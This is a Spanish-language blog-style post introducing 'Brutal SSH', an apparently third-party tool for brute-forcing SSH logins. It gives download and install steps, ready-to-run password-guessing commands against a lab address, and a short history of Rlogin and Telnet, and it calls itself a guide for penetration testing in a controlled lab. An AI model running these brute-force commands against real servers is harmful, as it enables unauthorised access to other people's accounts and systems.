LA SUITE COMPLETA PARA HACKEAR SSH

0

SSH BRUTAL – LA SUITE COMPLETA PARA HACKEAR SSH

Brutal SSH: Inicia sesión fuerza bruta, escanea en busca de versión vulnerable y explota vulnerabilidades 0_day.

SSH es un sistema de trasferencia segura de archivos. Se usa para el acceso remoto a otras máquinas. Por defecto usa el puerto 22, que por seguridad debería ser cambiado para que cuando se realice un escaneo de puertos el hacker no pueda ver que SSH está funcionando.

ssh
Funcionamiento de SSH

A continuacion te indico como instalar esta poderosa herramienta de hacking para que puedas hacer tus pruebas de penetracion, RECUERDA HACERLO EN UN LABORATORIO DE HACKING, CON UN AMBIENTE CONROLADO.

Requirementos

  • Python (2.7.*)
  • Python pip
  • Python module colorama
  • Python module argparse
  • Python module paramiko
  • Python module threading
  • Python module logging

DESCARGE

git clone https://github.com/d3vilbug/Brutal_SSH

INTALAR LOS MODULOS

pip install -r requirements.txt
Uso de Uso de BRUTAL SSH

USO

python brutal_SSH.py -h
  • Contraseña de fuerza bruta de un solo usuario
python brutal_SSH.py -i 192.168.7.128 -u msfadmin -P wordlist/passfile.txt
  • Usuario y contraseña de fuerza bruta
python brutal_SSH.py -i 192.168.7.128 -U wordlist/userfile.txt -P wordlist/passfile.txt

CURIOSIDADES DE SSH

Ante la necesidad de controlar a distancia otros ordenadores, surgió Rlogin. Un programa que a través de r-commands (comandos UNIX) permitía a un usuario loguearse en otro sistema (el host), enviar órdenes y que éstas fuesen ejecutadas en destino.Todo el proceso se realizaba a través del protocolo TCP/IP, permitiendo así el control de un ordenador en remoto, siempre y cuando éste estuviese conectado a alguna red.

El problema de Rlogin, era que almacenaba los credenciales de conexión en archivos en local, de manera que cuando un cliente deseaba conectar con el hostla conexión se establecía de manera automática. Esto suponía un importante agujero de seguridad ya que, establecida la conexión, si se desatendía el terminal de comandos, otra persona podía tomar el control de tu ordenador y del host. Por otro lado, cualquiera podía piratear los rhost files consiguiendo así las credenciales y clonándolas en otro cliente para poder acceder al host desde cualquier otro dispositivo.

Ante esta situación, surgió Telnet, que manteniendo la esencia de su predecesor añadía ciertas mejoras, principalmente en lo que a la seguridad se refiere. Telnet enviaba las credenciales por la red, de manera que el host detectaba si eran correctas y aprobaba el acceso.

Con el tiempo, Telnet llegó a ser el protocolo más usado para comunicaciones en remoto, pero pronto se hizo patente otro agujero de seguridad: Enviaba las credenciales sin cifrar, como texto plano.De esta forma podían sniffearse y ser robadas.

GRACIAS A:

EL CONOCIMIENTO ES LIBRE